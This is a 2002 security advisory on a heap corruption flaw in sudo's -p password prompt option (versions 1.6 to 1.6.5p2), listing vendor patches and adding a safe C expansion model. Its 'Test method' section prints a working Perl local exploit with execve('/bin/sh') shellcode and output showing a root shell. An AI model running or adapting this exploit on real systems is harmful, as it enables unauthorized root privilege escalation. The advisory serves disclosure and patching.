Sudo Password Prompt Command-Line Argument Heap Corruption Vulnerability
Published: 2002-04-25
Updated: 2002-04-29
Affected systems:
Todd Miller Sudo 1.6
- Linux
- Unix
Todd Miller Sudo 1.6.1
- Linux
- Unix
Todd Miller Sudo 1.6.2
- Linux
- Unix
Todd Miller Sudo 1.6.3
- Linux
- Unix
Todd Miller Sudo 1.6.3p1
- Linux
- Unix
Todd Miller Sudo 1.6.3p2
- Linux
- Unix
Todd Miller Sudo 1.6.3p3
- Linux
- Unix
Todd Miller Sudo 1.6.3p4
- Linux
- Unix
Todd Miller Sudo 1.6.3p5
- Linux
- Unix
Todd Miller Sudo 1.6.3p6
- Linux
- Unix
Todd Miller Sudo 1.6.3p7
- Linux
- Unix
Todd Miller Sudo 1.6.4
- Linux
- Unix
Todd Miller Sudo 1.6.4p1
- Linux
- Unix
Todd Miller Sudo 1.6.4p2
- Linux
- Unix
Todd Miller Sudo 1.6.5
- Linux
- Unix
Todd Miller Sudo 1.6.5p1
- Linux
- Unix
Todd Miller Sudo 1.6.5p2
- Linux
- Unix
Unaffected systems:
Todd Miller Sudo 1.6.6
- Linux
- Unix
Description:
BUGTRAQ ID: 4593
Sudo is a program that lets users securely execute commands with the privileges of another user; it is widely used on Linux and Unix systems.
Sudo's customizable password prompt feature contains a vulnerability that can lead to heap corruption.
Sudo allows the user to specify the password prompt. When parsing the -p option, sudo expands the escape sequences %h (hostname) and %u (username) in the supplied string, and when it processes these escapes it uses malloc() to allocate memory for the string passed to -p. An attacker who supplies an overly long string (for example an overly long hostname) via the -p option can corrupt the heap; because sudo is installed setuid root by default, this allows a local attacker to execute arbitrary commands as root.
Whether this feature is present depends on compile-time options; in testing, binaries built with PAM support were vulnerable, and many Linux distributions ship sudo built this way.
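As an added illustration (not sudo's source and not part of the advisory), the following model shows the safe way to handle the %h/%u expansion described above: the heap buffer is sized from the real replacement lengths, and the counting pass and the copying pass walk the format with the same rule, so the allocation can never be smaller than what is written. The hostname and username are assumed to be supplied by the caller.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Illustrative model, not sudo's source: expand %h/%u in a prompt into a
   heap buffer sized from the real replacement lengths (host/user non-NULL). */
/* Replacement for the escape at p, or NULL if p does not start %h or %u. */
static const char *escape_text(const char *p, const char *host, const char *user)
{
    if (p[0] != '%') return NULL;
    return p[1] == 'h' ? host : p[1] == 'u' ? user : NULL;
}

/* Pass 1: exact expanded length. It walks the format with the very same
   rule the copy pass uses, so count and copy cannot disagree. */
size_t expanded_len(const char *fmt, const char *host, const char *user)
{
    size_t n = 0;
    for (const char *p = fmt; *p; p++) {
        const char *rep = escape_text(p, host, user);
        if (rep) { n += strlen(rep); p++; }  /* p++ skips the 'h'/'u' */
        else n++;
    }
    return n;
}

/* Pass 2: allocate exactly expanded_len()+1 bytes, then copy. */
char *expand_prompt(const char *fmt, const char *host, const char *user)
{
    char *out = malloc(expanded_len(fmt, host, user) + 1), *q = out;
    if (out == NULL) return NULL;
    for (const char *p = fmt; *p; p++) {
        const char *rep = escape_text(p, host, user);
        if (rep) { size_t l = strlen(rep); memcpy(q, rep, l); q += l; p++; }
        else *q++ = *p;
    }
    *q = '\0';  /* q - out == expanded_len() by construction */
    return out;
}

int main(void)
{
    char host[301];  /* constructed 300-char hostname: grows the buffer, never overflows it */
    memset(host, 'x', 300); host[300] = '\0';
    char *pr = expand_prompt("[%u@%h] password for %u: ", host, "alice");
    printf("%zu bytes\n", strlen(pr));
    free(pr);
    return 0;
}
```

A trailing lone '%' and unknown escapes such as "%x" are copied literally by both passes, which is the property that keeps the allocation and the write in step.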
<*Source: Global InterSec Research (lists@globalintersec.com)
Links: http://archives.neohapsis.com/archives/bugtraq/2002-04/0349.html
http://archives.neohapsis.com/archives/bugtraq/2002-04/0350.html
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Use at your own risk!
[venglin@clitoris sudo-1.6.5p2]$ cat babunia.pl
$sudo = $ARGV[0];
$prompt = "h%h%h%h%aaaaaaaaaaaaaaaaaaaah%";
$prepad = 266;
$postpad = 512;
$retloc = hex(`objdump -R $sudo | grep '\\<_exit\\>' | cut -f1 -d' '`);
$retad = 0x8063b10;
$align = 20;
print "Prompt: $prompt\n";
print "Prepad: $prepad\n";
print "Postpad: $postpad\n";
print "Align: $align\n";
print "_exit() @ ", sprintf("0x%x\n", $retloc);
print "shellcode @ ", sprintf("0x%x\n", $retad);
$testcode = "\xeb" . chr($align);
$testcode .= "\x90" x $align;
$testcode .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c";
$testcode .= "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb";
$testcode .= "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
$frame = pack('l', 0x01010101);
$frame .= pack('l', $retloc-12);
$frame .= pack('l', $retad);
$path = "a" x $prepad;
$path .= $frame;
$path .= $testcode;
$path .= "a"x($postpad - length($testcode));
system($sudo, "-p", $prompt, $path);
[venglin@clitoris sudo-1.6.5p2]$ perl ./babunia.pl ./sudo
Prompt: h%h%h%h%aaaaaaaaaaaaaaaaaaaah%
Prepad: 266
Postpad: 512
Align: 20
_exit() @ 0x805fe40
shellcode @ 0x8063b10
litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaah%
Sorry, try again.
litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaaI
¨¨ry again.
litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaaI
¨¨ry again.
./sudo: 3 incorrect password attempts
# id
uid=0(root) gid=1000(users) egid=0(root) groups=1000(users),6(disk),23(audio),24(video)
Recommendations:
Temporary workaround:
If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:
* Use chmod a-s to remove the setuid bit from sudo, or remove all entries from /etc/sudoers.
Vendor patch:
Todd Miller
-----------
The vendor has released an upgrade to fix this security issue; please download it from the vendor's homepage:
Todd Miller Sudo 1.6:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.1:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.2:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Debian Upgrade sudo_1.6.2p2-2.2_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/sudo_1.6.2p2-2.2_alpha.deb
Debian Upgrade sudo_1.6.2p2-2.2_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/sudo_1.6.2p2-2.2_arm.deb
Debian Upgrade sudo_1.6.2p2-2.2_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/sudo_1.6.2p2-2.2_i386.deb
Debian Upgrade sudo_1.6.2p2-2.2_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/sudo_1.6.2p2-2.2_m68k.deb
Debian Upgrade sudo_1.6.2p2-2.2_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/sudo_1.6.2p2-2.2_powerpc.deb
Debian Upgrade sudo_1.6.2p2-2.2_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/sudo_1.6.2p2-2.2_sparc.deb
Todd Miller Sudo 1.6.3 p7:
Slackware Patch sudo.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-8.0/patches/packages/sudo.tgz
Slackware 8.0.
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.3 p6:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.3 p5:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.3 p4:
Slackware Patch sudo.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-7.1/patches/packages/sudo.tgz
Slackware 7.1.
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.3 p3:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.3 p2:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.3 p1:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.3:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.4 p2:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.4 p1:
Conectiva Upgrade sudo-1.6.6-1U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/sudo-1.6.6-1U50_1cl.i386.rpm
Conectiva Upgrade sudo-1.6.6-1U50_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/sudo-1.6.6-1U50_1cl.src.rpm
Source RPM.
Conectiva Upgrade sudo-1.6.6-1U50_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/sudo-1.6.6-1U50_1cl.src.rpm
Source RPM.
Conectiva Upgrade sudo-1.6.6-1U50_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/sudo-1.6.6-1U50_1cl.src.rpm
Source RPM.
Conectiva Upgrade sudo-1.6.6-1U51_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/sudo-1.6.6-1U51_1cl.i386.rpm
Conectiva Upgrade sudo-1.6.6-1U51_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/sudo-1.6.6-1U51_1cl.src.rpm
Source RPM.
Conectiva Upgrade sudo-1.6.6-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sudo-1.6.6-1U60_1cl.i386.rpm
Conectiva Upgrade sudo-1.6.6-1U60_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sudo-1.6.6-1U60_1cl.src.rpm
Source RPM.
Conectiva Upgrade sudo-1.6.6-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sudo-1.6.6-1U70_1cl.i386.rpm
Conectiva Upgrade sudo-1.6.6-1U70_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sudo-1.6.6-1U70_1cl.src.rpm
Source RPM.
Conectiva Upgrade sudo-1.6.6-1U8_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sudo-1.6.6-1U8_1cl.i386.rpm
Conectiva Upgrade sudo-1.6.6-1U8_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/sudo-1.6.6-1U8_1cl.src.rpm
Source RPM.
Conectiva Upgrade sudo-doc-1.6.6-1U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/sudo-doc-1.6.6-1U50_1cl.i386.rpm
Conectiva Upgrade sudo-doc-1.6.6-1U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/sudo-doc-1.6.6-1U50_1cl.i386.rpm
Conectiva Upgrade sudo-doc-1.6.6-1U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/sudo-doc-1.6.6-1U50_1cl.i386.rpm
Conectiva Upgrade sudo-doc-1.6.6-1U51_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/sudo-doc-1.6.6-1U51_1cl.i386.rpm
Conectiva Upgrade sudo-doc-1.6.6-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sudo-doc-1.6.6-1U60_1cl.i386.rpm
Conectiva Upgrade sudo-doc-1.6.6-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sudo-doc-1.6.6-1U70_1cl.i386.rpm
Conectiva Upgrade sudo-doc-1.6.6-1U8_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sudo-doc-1.6.6-1U8_1cl.i386.rpm
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Conectiva Upgrade sudo-1.6.6-1U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/sudo-1.6.6-1U50_1cl.i386.rpm
Conectiva Upgrade sudo-1.6.6-1U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/sudo-1.6.6-1U50_1cl.i386.rpm
Todd Miller Sudo 1.6.4:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 7.1 i586.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.0 PPC Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.1 i586.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.1 i586 Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.ia64.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.1 ia64.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.1 ia64 Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.2 i586.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.2 i586 Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.ppc.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.2 PPC.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.2 PPC Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Corporate Server 1.0.1.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Corporate Server 1.0.1 Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Single Network Firewall 7.2.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Single Network Firewall 7.2 Source RPM.
Red Hat Upgrade sudo-1.6.5p2-1.6x.1.src.rpm
ftp://updates.redhat.com/6.2/en/powertools/SRPMS/sudo-1.6.5p2-1.6x.1.src.rpm
Source RPM.
Red Hat Upgrade sudo-1.6.5p2-1.6x.1.alpha.rpm
ftp://updates.redhat.com/6.2/en/powertools/alpha/sudo-1.6.5p2-1.6x.1.alpha.rpm
Red Hat Upgrade sudo-1.6.5p2-1.6x.1.i386.rpm
ftp://updates.redhat.com/6.2/en/powertools/i386/sudo-1.6.5p2-1.6x.1.i386.rpm
Red Hat Upgrade sudo-1.6.5p2-1.6x.1.sparc.rpm
ftp://updates.redhat.com/6.2/en/powertools/sparc/sudo-1.6.5p2-1.6x.1.sparc.rpm
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.src.rpm
ftp://updates.redhat.com/7.0/en/os/SRPMS/sudo-1.6.5p2-1.7x.1.src.rpm
Source RPM.
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/sudo-1.6.5p2-1.7x.1.alpha.rpm
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/sudo-1.6.5p2-1.7x.1.i386.rpm
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.src.rpm
ftp://updates.redhat.com/7.1/en/os/SRPMS/sudo-1.6.5p2-1.7x.1.src.rpm
Source RPM.
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/sudo-1.6.5p2-1.7x.1.alpha.rpm
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/sudo-1.6.5p2-1.7x.1.i386.rpm
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/sudo-1.6.5p2-1.7x.1.ia64.rpm
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.src.rpm
ftp://updates.redhat.com/7.2/en/os/SRPMS/sudo-1.6.5p2-1.7x.1.src.rpm
Source RPM.
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/sudo-1.6.5p2-1.7x.1.i386.rpm
Red Hat Upgrade sudo-1.6.5p2-1.7x.1.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/sudo-1.6.5p2-1.7x.1.ia64.rpm
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 7.1 i586 Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 7.2 i586.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 7.2 i586 Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.i586.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.0 i586.
Mandrake Upgrade sudo-1.6.4-3.1mdk.src.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.0 i586 Source RPM.
Mandrake Upgrade sudo-1.6.4-3.1mdk.ppc.rpm
http://www.mandrakesecure.net/en/ftp.php
Mandrake Linux 8.0 PPC.
Todd Miller Sudo 1.6.5 p2:
Global InterSec Patch sudo-1.6.5p3.patch
http://www.globalintersec.com/adv/files/sudo-1.6.5p3.patch
Unofficial source code patch from Global InterSec.
NetBSD Patch netbsd-sudo-pwprompt.patch
http://downloads.securityfocus.com/vulnerabilities/patches/netbsd-sudo-pwprompt.patch
Patch for the NetBSD port of sudo 1.6.5p2, for pkgsrc/security/sudo/patches.
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
OpenBSD Patch 002_sudo.patch
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.1/common/002_sudo.patch
Patch for the OpenBSD 3.1 port of sudo.
Todd Miller Sudo 1.6.5 p1:
Slackware Upgrade sudo-1.6.6-i386-1.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/sudo-1.6.6-i386-1.tgz
Slackware -current.
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Todd Miller Sudo 1.6.5:
Todd Miller Upgrade sudo-1.6.6.tar.gz
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz